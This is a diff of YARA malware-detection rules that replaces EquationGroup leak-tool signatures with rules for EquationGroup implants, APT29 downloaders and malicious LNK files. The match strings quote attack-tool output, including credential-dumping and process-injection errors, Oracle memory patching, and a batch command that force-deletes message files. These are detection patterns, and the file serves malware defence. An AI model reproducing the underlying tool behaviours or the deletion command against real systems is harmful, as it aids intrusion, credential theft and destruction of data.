+		$s4 = "RHTTP/1.0" fullword wide
+		$s5 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Smbtouch_1_1_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "225799cf-4d1b-54f8-8b76-b9ee1db80ce7"
-		date = "2017-04-15"
+		description = "EquationGroup Malware - file mssld.dll"
+		author = "Auto Generated"
+		id = "f664ad78-1820-5434-94cc-94f98b32e654"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1653-L1666"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1773-L1787"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5eb9d45dfc47470236923a5b8174bc17733e4333db6f8bbe63c4f4bc913cf26"
+		logic_hash = "6b43280a94f1f5c62185f6b879126bcd258e9875beeb0f7ec1e3569494a60669"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
+		hash1 = "69dcc150468f7707cc8ef618a4cea4643a817171babfba9290395ada9611c63c"
 
 	strings:
-		$x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
+		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
+		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
+		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholartouch_1_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Getadmin_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file GetAdmin_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62205374-25a3-5b96-ad0a-a82c9a01a242"
-		date = "2017-04-15"
+		id = "3bbe0553-a5a3-5207-a94e-ad978606d9a4"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1668-L1682"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1789-L1802"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4c06fad158db8337ff768ad1553401ec31eee6b0d50333ce91a3a12e79d8981a"
+		logic_hash = "5bff3858c59b1bb44c5e24ca5f77d8e1e582224cc1caad3955d1adb0efea318a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
+		hash1 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
 
 	strings:
-		$x1 = "[!] A vulnerable target will not respond." fullword ascii
-		$x2 = "[-] Target NOT Vulernable" fullword ascii
+		$x1 = "Current user is System -- unable to join administrators group" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudittouch_2_1_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifygroup_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file ModifyGroup_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb66245e-1261-50bd-8666-75fc4c52ad84"
-		date = "2017-04-15"
+		id = "82c9617a-3d78-525f-a507-76c87aad7c59"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1684-L1698"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1805-L1819"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f4e62ec7a68115d5ff155ea94fb2c99b9177e928533338a111e531c694ff7b8f"
+		logic_hash = "8fe5102cacd9149a0ed60440c563953d487aa2b28a3b947d821d0cc3f3396a4a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
+		hash1 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
 
 	strings:
-		$x1 = "[-] Touching the target failed!" fullword ascii
-		$x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii
+		$s1 = "Modify Privileges failed" fullword wide
+		$s2 = "Given privilege name not found" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rpctouch_2_1_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Pwdump_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file pwdump_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0691768b-ca98-5722-8468-737c4966d54d"
-		date = "2017-04-15"
+		id = "6f356f13-9ec1-5dd9-91b2-6a3071398e81"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1700-L1714"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1821-L1834"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3ea1f30c0a2c91cc9ca2eec8eaab167c83f4f52c2732d03d1e7fb99e63986662"
+		logic_hash = "7381ffd9b2b720fa99d52bc5805fea942e5a966bf3fd611f1a80a875edd06dad"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
+		hash1 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
 
 	strings:
-		$x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii
-		$x2 = "[*] SMB String: %s (%s)" fullword ascii
+		$x1 = "PWDUMP - - ERROR - -" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mofconfig_1_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Eventlogedit_Implant : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file EventLogEdit_Implant.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d0d32e19-d004-5941-a5b3-0b4306565cf2"
-		date = "2017-04-15"
+		id = "40239dd0-4159-5c10-96b3-4f1e28c92d97"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1716-L1729"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1836-L1851"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a922eb01efa52601b72c3d91a26585504fcf706a9ed16a36328f94f5871b0b24"
+		logic_hash = "1d391eaed77150ab2a26dfed60ebd82aa2c6802b6b604791fb78d08db7fe5ec9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
+		hash1 = "0bb750195fbd93d174c2a8e20bcbcae4efefc881f7961fdca8fa6ebd68ac1edf"
 
 	strings:
-		$x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii
+		$s1 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\%ls" fullword wide
+		$s2 = "Ntdll.dll" fullword ascii
+		$s3 = "hZwOpenProcess" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easypi_Explodingcan : FILE
+rule SIGNATURE_BASE_Equationgroup_Portmap_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file PortMap_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "53d4ebf1-cce3-5fc8-8304-064b4113c9d7"
-		date = "2017-04-15"
+		id = "e1851a17-9858-5c93-9993-2da0559e5d2e"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1731-L1747"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1853-L1868"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c5978d8cbffde2339cadd84f44d1df24e76f298a2f05bd9a6565246bfae1b1e3"
+		logic_hash = "9666e64b40dc01c5b3756b1334519730765f7075ba9a124a79f5b7ea4bc91e03"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
-		hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
+		hash1 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
 
 	strings:
-		$x1 = "[-] %s - Target might not be in a usable state." fullword ascii
-		$x2 = "[*] Exploiting Target" fullword ascii
-		$x3 = "[-] Encoding Exploit Payload failed!" fullword ascii
+		$s1 = "Privilege elevation failed" fullword wide
+		$s2 = "Portmap ended due to max number of ports" fullword wide
+		$s3 = "Invalid parameters received for portmap" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Processoptions_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file ProcessOptions_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87e46fcd-d3e5-506a-97f3-8a18a7ba8042"
-		date = "2017-04-15"
+		id = "5ccb9751-fbcc-538c-8d55-dfc495067ce5"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1749-L1763"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1870-L1883"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4707dbbb302b9b2192bdd23e4b64e25b5b2f49c3dd7951905a07cb5b54d524d9"
+		logic_hash = "cc9cd566f57d28ccea6d53d2eba71187f01cdf6e140771cace33349f6439461d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
+		hash1 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
 
 	strings:
-		$x1 = "[-] The target is NOT vulnerable" fullword ascii
-		$x2 = "[+] The target IS VULNERABLE" fullword ascii
+		$s1 = "Invalid parameter received by implant" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Iistouch_1_2_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Passfreely_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file PassFreely_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd6ea8cc-505d-5c7c-a7ea-c5fa4f14b5ee"
-		date = "2017-04-15"
+		id = "5fb99194-f0df-54aa-9f20-7f8458155e62"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1765-L1779"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1885-L1900"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f4f5e17d3777d6ae8bfd0646eeffcd631331e4d8966f5124ebc9352438dc790f"
+		logic_hash = "c3ceb04b42b6e741b1578ec9ecb83b72c599d9af457d6d4e8de572e481d3aa5c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
+		hash1 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
 
 	strings:
-		$x1 = "[-] Are you being redirectect? Need to retarget?" fullword ascii
-		$x2 = "[+] IIS Target OS: %s" fullword ascii
+		$s1 = "Unexpected value in memory.  Run the 'CheckOracle' or 'memcheck' command to identify the problem" fullword wide
+		$s2 = "Oracle process memory successfully modified!" fullword wide
+		$s3 = "Unable to reset the memory protection mask to the memory" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Namedpipetouch_2_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0a5519d7-9811-5159-8df2-0cb2995d5085"
-		date = "2017-04-15"
+		id = "331d7ba5-e3fa-5ab7-b4de-c7af764be03d"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1781-L1800"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1904-L1933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "63d4395db4672b7a146dbd285e42344fb895b38f67fa9f7885b73855d7211190"
+		logic_hash = "97fe69f0c8f2fc44fdcd796c9390c3912f31c56540af1ca8f2baab16d1e91add"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
-		hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
+		super_rule = 1
+		hash1 = "694be2698bcc5c7a1cce11f8ef65c1c96a883d14b98148c36b32888fb58b6a7e"
+		hash2 = "73d1d55493886639c619e9f5e312daab93e4feeb74f24dbe51593842baac8d15"
+		hash3 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
+		hash4 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
+		hash5 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
+		hash6 = "8f5b97124de9fce16e2cfecb7dd2e171824c9e07546db7b3bee7c5f2c92ceda9"
+		hash7 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
+		hash8 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48"
+		hash9 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
+		hash10 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
+		hash11 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
+		hash12 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
+		hash13 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
+		hash14 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
+		hash15 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
 
 	strings:
-		$s1 = "[*] Summary: %d pipes found" fullword ascii
-		$s3 = "[+] Testing %d pipes" fullword ascii
-		$s6 = "[-] Error on SMB startup, aborting" fullword ascii
-		$s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii
-		$op1 = { 68 10 10 40 00 56 e8 e1 }
+		$x1 = "Injection Lib -  GetProcAddress failed on Kernel32.DLL function" fullword wide
+		$x2 = "Injection Lib -  JUMPUP failed to open requested process" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easybee_1_0_1 : FILE
+
+rule SIGNATURE_BASE_Equationdrug_MS_Identifier
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f170ed34-f7d1-5eb2-9400-4308b6b39388"
-		date = "2017-04-15"
+		description = "Microsoft Identifier used in EquationDrug Platform"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "c934c117-bf5a-5688-acd9-5d6c6aacd6bc"
+		date = "2015-03-11"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1802-L1816"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1937-L1948"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e3488a1d686b9ad468553cfe2c939e70ea6b9a21409df8b06bb54418495576ec"
+		logic_hash = "7b919c82b6e765be5adb927bf79d13f9b37a214a6f8a1f7b237a88ba46ae958c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
+		tags = ""
 
 	strings:
-		$x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii
-		$x2 = "Logging out of WebAdmin (as target account)" fullword ascii
+		$s1 = "Microsoft(R) Windows (TM) Operating System" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		$s1 and pe.timestamp > 946684800
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regread_1_1_1 : FILE
+rule SIGNATURE_BASE_M_APT_Downloader_BEATDROP : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "99a2b146-a277-5917-9a84-3d396d2c8bf9"
-		date = "2017-04-15"
+		description = "Rule looking for BEATDROP malware"
+		author = "Mandiant"
+		id = "5720870e-8989-59f2-998b-019084d091ce"
+		date = "2022-04-28"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1818-L1832"
+		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_apr22.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5bf833d7fb073ad74037cf6df4729c75d50641a46a962aee8deac19e31b74419"
-		score = 75
+		logic_hash = "7a766682cc9a057798cc569111bfcb611648c4a052c0dd664d983b80d5891255"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
 
 	strings:
-		$s1 = "[+] Connected to the Registry Service" fullword ascii
-		$s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii
+		$ntdll1 = "ntdll" ascii fullword
+		$ntdll2 = "C:\\Windows\\System32\\ntdll.dll" ascii fullword nocase
+		$url1 = "api.trello.com" ascii
+		$url2 = "/members/me/boards?key=" ascii
+		$url3 = "/cards?key=" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Englishmansdentist_1_2_0 : FILE
+rule SIGNATURE_BASE_M_APT_Downloader_BOOMMIC : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "76367c53-9b48-59a1-9ac9-8649fd833fe3"
-		date = "2017-04-15"
+		description = "Rule looking for BOOMMIC malware"
+		author = "Mandiant"
+		id = "34ea08a6-5d6f-5cdd-a629-fa36313c98f7"
+		date = "2022-04-28"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1834-L1848"
+		reference = "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_apr22.yar#L19-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd415731c1c8398d2b0b1758c4e7eb3e708620b269f9312cf0a750ab2099162e"
+		logic_hash = "c561b19464597f896d31307c0383fbc639cf4211600513e1251a3f59405bfed6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
 
 	strings:
-		$x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii
-		$x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii
+		$loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D C3 }
+		$loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }
+		$func1 = "GetComputerNameExA" ascii
+		$func2 = "HttpQueryInfoA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 1MB and ( ( $loc_10001000 and $func1 ) or ( $loc_100012fd and $func2 ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Lnkfileoverrfc : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "df3b0794-cbbd-530c-8425-fdf4b116b870"
-		date = "2017-04-15"
+		description = "Detects APT lnk files that run double extraction and launch routines with autoruns"
+		author = "@Grotezinfosec, modified by Florian Roth"
+		id = "19c393af-ff7c-5345-a3ef-c06372344baf"
+		date = "2018-09-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1850-L1870"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk_files.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "faeac75104a15cac8528663a82eadbc7bc22cc0a1d1a3b3dfccb6ea46fb24a67"
-		score = 75
+		logic_hash = "52ff949a17039c1fa5707ff503aa1a96b3925bdfef01867c9b59a8d72493a84e"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
-		hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
